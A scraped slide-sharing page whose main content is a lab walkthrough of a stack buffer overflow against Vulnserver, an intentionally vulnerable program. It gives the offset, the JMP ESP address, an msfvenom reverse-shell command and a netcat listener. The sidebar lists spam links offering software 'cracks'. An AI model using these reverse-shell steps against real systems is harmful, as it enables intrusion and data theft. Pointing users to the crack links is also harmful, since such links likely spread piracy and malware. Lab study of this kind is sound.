Adobe Illustrator Crack FREE Download 2025 Latest Version
Adobe Illustrator Crack FREE Download 2025 Latest VersionAdobe Illustrator Crack FREE Download 2025 Latest Version
Adobe Illustrator Crack FREE Download 2025 Latest Version
kashifyounis067
 
Secure Test Infrastructure: The Backbone of Trustworthy Software Development
Secure Test Infrastructure: The Backbone of Trustworthy Software DevelopmentSecure Test Infrastructure: The Backbone of Trustworthy Software Development
Secure Test Infrastructure: The Backbone of Trustworthy Software Development
Shubham Joshi
 
Expand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchangeExpand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchange
Fexle Services Pvt. Ltd.
 
WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)
sh607827
 
Not So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java WebinarNot So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java Webinar
Tier1 app
 
Automation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath CertificateAutomation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath Certificate
VICTOR MAESTRE RAMIREZ
 
Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025
mu394968
 
Revolutionizing Residential Wi-Fi PPT.pptx
Revolutionizing Residential Wi-Fi PPT.pptxRevolutionizing Residential Wi-Fi PPT.pptx
Revolutionizing Residential Wi-Fi PPT.pptx
nidhisingh691197
 
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Orangescrum
 
Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]
saniaaftab72555
 
Top 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docxTop 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docx
Portli
 
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage DashboardsAdobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
BradBedford3
 
Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025
kashifyounis067
 
How can one start with crypto wallet development.pptx
How can one start with crypto wallet development.pptxHow can one start with crypto wallet development.pptx
How can one start with crypto wallet development.pptx
laravinson24
 
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Eric D. Schabell
 
Microsoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdf
Microsoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdfMicrosoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdf
Microsoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdf
TechSoup
 
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
Egor Kaleynik
 
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
steaveroggers
 
Adobe Master Collection CC Crack Advance Version 2025
Adobe Master Collection CC Crack Advance Version 2025Adobe Master Collection CC Crack Advance Version 2025
Adobe Master Collection CC Crack Advance Version 2025
kashifyounis067
 
Kubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptxKubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptx
CloudScouts
 
Adobe Illustrator Crack FREE Download 2025 Latest Version
Adobe Illustrator Crack FREE Download 2025 Latest VersionAdobe Illustrator Crack FREE Download 2025 Latest Version
Adobe Illustrator Crack FREE Download 2025 Latest Version
kashifyounis067
 
Secure Test Infrastructure: The Backbone of Trustworthy Software Development
Secure Test Infrastructure: The Backbone of Trustworthy Software DevelopmentSecure Test Infrastructure: The Backbone of Trustworthy Software Development
Secure Test Infrastructure: The Backbone of Trustworthy Software Development
Shubham Joshi
 
Ad

Vulnserver bufferoverflow

  • 1. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow Eric Alleshouse -- Independent Security Researcher [email protected] April 20 2017 How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 1
  • 2. Table of Contents How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow……………....……………….……………………....……...1 Introduction…………………………………….……………………………..3 Lab setup……………………………….………………………………3 Immunity configuration………………..…….…………………………..….4 Simple buffer test…………………………….……………………………....5 Nmap scan……………………………………………………………………..6 Crashing the program…………………………………………………….….7 A unique string ………………………………………………………….…....7 Pattern Offset………………………………………………………….….…...9 The bytearray…………………………………………………………..……..10 Truncation………………...………………………………………………..….11 JMP ESP….……………………………....………..…………………….…....12 The final Exploit compiled ...…………………………………………...….13 Shell received ……………………………………………..………………....14 How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 2
  • 3. **A special thanks goes out to Aryan Guenthner, Penetration Tester, who has guided and encouraged me to ‘Try Harder’ at succeeding with this project and to produce this report. ** Introduction Vulnserver is an intentionally vulnerable program introduced by Stephen Bradshaw in 2010. It serves the purpose of providing a place for him to improve his coding abilities, and test various shellcode and for other exploits. He encourages others to find exploits in the server, but for the purpose of this document, I will focus on flooding the memory buffer with a malicious shellcode which will allow me access to the Windows machine through a shell on my Kali OS. Vulnserver can be downloaded ​here. Lab setup I’m using the VirtualBox hypervisor with a Kali 4.6.4 and Windows 7/IE 8 virtual machines. Installed on the Windows machine is the SLmail pop server and immunity debugger with the mona.py script inserted into the python commands folder within Immunity debugger. The firewall in Windows has been turned off to simulate a possible real world simulation of security misconfiguration. Perhaps the firewall was disabled for troubleshooting purposes and forgotten about, among other scenarios that represent a How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 3
  • 4. misconfiguration. This exercise shows a consequence of failing to audit a system resulting in an exploit of the system and exposure to sensitive files. Vulnserver can be downloaded from https://github.com/stephenbradshaw/vulnserver Kali can be downloaded from ​http://www.kali.org Immunity debugger: ​https://www.immunityinc.com/products/debugger/index.html Virtualbox: ​https://www.virtualbox.org/wiki/Downloads Mona.py (which is inserted into the commands folder in Immunity): https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ Once the VM’s are set up, I made sure the VM’s are on the ‘host only’ network so they are kept from being exposed to the internet. The Vm’s should be on the same network and able to ping each other. As a side note, my host operating system is a MacBook Pro, and I have found a limitation for drag and drop between host and guest, so the workaround to this is to create a shared folder on the host that is accessible to the vm’s. Netcat will also work to transfer files, but takes a little more time to set up because it is not a native program within Windows. The goal of the exercise is to redirect the EIP memory address to a JMP ESP address leading the execution flow to a shellcode which I injected into memory. Within Immunity debugger, set the working folder to c:logs by issuing the command: !mona config -set workingfolder c:logs All created documents from Mona will be found there. First, I need to verify the crash of the application by using a poc.py script to fuzz the application. The exploit variable will send 2500 ‘A’s to verify that the program is vulnerable to a memory stack overflow. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 4
  • 5. 2500 ‘A’s sent to the server Here is a snapshot of the the whole exploit to start with. It is written in python and imports the socket module to make a connection to the remote Vulnserver. It will send 2500 ‘A’s along with the ‘TRUN’ command which the server is vulnerable to. The server ip reflects the ip address of my windows machine where vulnserver resides and the port it uses is 9999, which I found from a simple nmap scan of the ip address. . Initial exploit How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 5
  • 6. Nmap scan of the windows machine After running this program from the Kali terminal, the result shows that the program crashes and ESP contains many ‘A’s or ‘41’ in hex. This shows that the boundary hasn’t been checked as I can inject my own data into the program and cause it to crash. Each time the program is crashed, the Vulnserver needs to be restarted, and it’s process attached to Immunity. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 6
  • 7. In order to find the specific location of ESP, a unique string needs to be sent to the program and the offset address located from the debugger. Use the Immunity command !mona pc 2500 (to create a unique string of characters. There is also a tool within Kali in the directory which does the same thing located in: /usr/share/metasploit-framework/tools/exploit/pattern_create Copy the unique string into the simple program and send it to the vulnserver. ie.exploit = 'Aa0Aa1Aa2Aa....' instead of the ‘A’s The unique pattern string will be found in the c:logs working folder after using the mona command. Or from Kali How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 7
  • 8. Note the exploit was changed from ‘A’s to the unique string created. Then it was sent to the vulnserver to crash again. After the system crashes, locate the position of EIP. The memory address in this case is 396f4338 as indicated by immunity debugger. To find this, Issue the Immunity command !mona po 396f4338 to find the location of EIP (or use the Kali tool /usr/share/metasploit_framework/tools/exploit/pattern_offset -q 396f4338 to find it's location) eg. !mona po 396f4338 How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 8
  • 9. The Pattern Offset was found at position 2006 so the exploit will get changed to offset = 'A'*2006. EIP will be the next 4 bytes in memory, so the pattern offset now becomes 'A'*2006 + 'B'*4 (run the script to verify control of the EIP by noting that 4 ‘B’s get written to the EIP register. You can see the 4 ‘B’s at the end of the ‘A’s. This is where your JMP ESP will go a little later. EIP has 4 ‘B’s written to it Use Immunity !mona bytearray to create a list of all the possible hex characters. The file will be saved to c:logs. Copy the string into the program and send this in place of the offset to view any truncation caused by other bad characters, and eliminate them one by one until a clean set of characters is able to be passed to the program without issue. Below is illustrated all possible hex characters.It is important to remove these bad characters so that the shellcode will be run successfully. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 9
  • 10. Send the bytearray from the exploit : offset = 'A'*2006 + ‘B’*4 + badchars to see if there is any truncation caused by characters from the array. The picture with truncation happening shows that the 00 character is causing problems afterward indicated by a bunch of 00’s . How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 10
  • 11. Truncation No more truncation after the 00 byte is removed After bad characters x00 is removed there is no more truncation. The hex string is successfully inserted to the memory buffer without problems. This byte will be excluded when creating the shellcode with msfvenom later on in the exercise. Use Immunity !mona modules -o (to find the modules compatible with dlls within Vulnserver to exploit. ASLR and DEP randomize memory addresses of the JMP ESP and are used for security purposes and modules should not be selected that have these functions active. There are instances where they are not used because of common program instructions needing to use them. I chose essfunc.dll. The -o option filters out the operating system modules to whittle the module list to relevant listings.) How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 11
  • 12. Use Immunity !mona find -s 'xffxe4' -m .dll (to find the location of a JMP ESP location) I verify the address contains a jmp esp by searching that memory address in the debugger The JMP ESP in my case is located at 625011af. Written in little endian format, it will become 'xafx11x50x62' in the exploit. (I replace the 'B' with JMP ESP address in little endian format! Since I control EIP, I can direct it to go to the JMP ESP address, slide down some no-operation instructions and fall into the malicious shellcode. To create a payload in Kali without the bad characters and insert this as a variable in the script, I type: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.102 LPORT=443 -f py -a x86 --platform windows -b 'x00' The exploit becomes exploit = offset + JMP ESP + nops + buff (offset is the memory just before EIP) (JMP ESP is the address location of EIP) (buf was the shellcode created in kali which contains my reverse tcp shell. In this case there is just a snip of the shell code) (nops are sent to create a little space and be sure that the shellcode gets run in the memo How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 12
  • 13. Final exploit How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 13
  • 14. . Setup a netcat listener in Kali so the Windows machine has a place to connect to. nc -lvp 443 Send the exploit ./poc.py to Vulnserver A shell is gained on the compromised Windows machine by exploiting a vulnerability in the Vulnserver programming. There was no boundary check to the user input, so I was able to make the program crash and gain entry to the system. The next phase of the process is Post exploitation where I can perform data exfiltration and more laterally through various machines on the network. Other useful information can be gained from other computers, printers, and routers. System information gathered How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 14
  • 15. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 15